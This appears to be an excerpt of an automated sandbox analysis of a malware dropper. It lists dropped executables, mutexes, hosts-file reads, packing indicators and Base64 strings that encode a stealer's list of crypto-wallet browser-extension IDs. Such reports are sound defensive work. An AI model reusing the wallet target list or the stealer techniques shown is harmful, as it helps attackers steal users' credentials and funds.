bWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                    Source: jshainx.exe.0.dr, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                    Source: 21.0.namdoitntn.exe.d30000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                    Source: 25.0.jshainx.exe.220000.0.unpack, BrEx.csBase64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6732:120:WilError_01
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeMutant created: \Sessions\1\BaseNamedObjects\iqroq5112542785672901323
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4632:120:WilError_01
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile opened: C:\Windows\SysWOW64\msftedit.DLLJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
                    Source: q1wLT3xKiY.exeStatic file information: File size 2701003 > 1048576
                    Source: Binary string: wextract.pdb source: captain09876.exe, 0000001C.00000000.325288251.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp, captain09876.exe, 0000001C.00000002.824031126.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: wextract.pdbGCTL source: captain09876.exe, 0000001C.00000000.325288251.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp, captain09876.exe, 0000001C.00000002.824031126.00007FF7E2D99000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: C:\wiroguzaxun\lefereyocimuwu-fep\22\wipo\57_so.pdb source: F0geI.exe, 0000000E.00000000.299494274.0000000000401000.00000020.00000001.01000000.00000006.sdmp
                    Source: Binary string: C:\Soboya xola sikine\nalac\Lohoc\Docamap.pdb source: q1wLT3xKiY.exe

                    Data Obfuscation

                    barindex
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeUnpacked PE file: 14.2.F0geI.exe.400000.0.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeUnpacked PE file: 16.2.kukurzka9000.exe.400000.0.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeUnpacked PE file: 14.2.F0geI.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeUnpacked PE file: 16.2.kukurzka9000.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeUnpacked PE file: 22.2.real.exe.60900000.1.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeUnpacked PE file: 26.2.brokerius.exe.60900000.1.unpack
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeUnpacked PE file: 31.2.WW1.exe.60900000.1.unpack
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeCode function: 0_3_045C8259 push ecx; ret 0_3_045C826C
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeCode function: 0_3_045C642D push FFFFFFB7h; retf 0_3_045C642F
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeCode function: 0_3_045C6161 push ss; ret 0_3_045C6162
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_006E12D6 push esp; ret 14_2_006E12E0
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_006E0DB9 pushad ; retf 14_2_006E0DBA
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0239EFE0 push edx; ret 16_2_0239F158
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: 16_2_0239EE90 push edx; ret 16_2_0239EE9B
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: 14_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,14_2_00408ADD
                    Source: namdoitntn.exe.0.drStatic PE information: 0xDE8E08D8 [Mon Apr 26 20:38:48 2088 UTC]
                    Source: nss3.dll.14.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.14.drStatic PE information: section name: .didat
                    Source: mozglue.dll.14.drStatic PE information: section name: .00cfg
                    Source: freebl3.dll.14.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.14.drStatic PE information: section name: .00cfg
                    Source: sqlite3.dll.14.drStatic PE information: section name: /4
                    Source: sqlite3.dll.14.drStatic PE information: section name: /19
                    Source: sqlite3.dll.14.drStatic PE information: section name: /31
                    Source: sqlite3.dll.14.drStatic PE information: section name: /45
                    Source: sqlite3.dll.14.drStatic PE information: section name: /57
                    Source: sqlite3.dll.14.drStatic PE information: section name: /70
                    Source: sqlite3.dll.14.drStatic PE information: section name: /81
                    Source: sqlite3.dll.14.drStatic PE information: section name: /92
                    Source: real.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x502e1
                    Source: q1wLT3xKiY.exeStatic PE information: real checksum: 0x3b377 should be: 0x294695
                    Source: ordo_sec666.exe.0.drStatic PE information: real checksum: 0x1bb975 should be: 0x1c98a8
                    Source: WW1.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4db20
                    Source: jshainx.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1d394
                    Source: namdoitntn.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1ad86
                    Source: kukurzka9000.exe.0.drStatic PE information: real checksum: 0x0 should be: 0xc1aef
                    Source: safert44.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4c647
                    Source: brokerius.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4c2bd
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.993561805567131
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\brokerius.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\real.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEFile created: C:\Users\user\AppData\Local\Temp\Alwgckdftdslvwbqpdbjc13t.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\safert44.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\nss3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\captain09876.exeJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeFile created: C:\Users\user\TypeRes\DllResource.exeJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\jshainx.exeJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\msvcp140.dllJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\Company\NewProduct\WW1.exeJump to dropped file
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeFile created: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
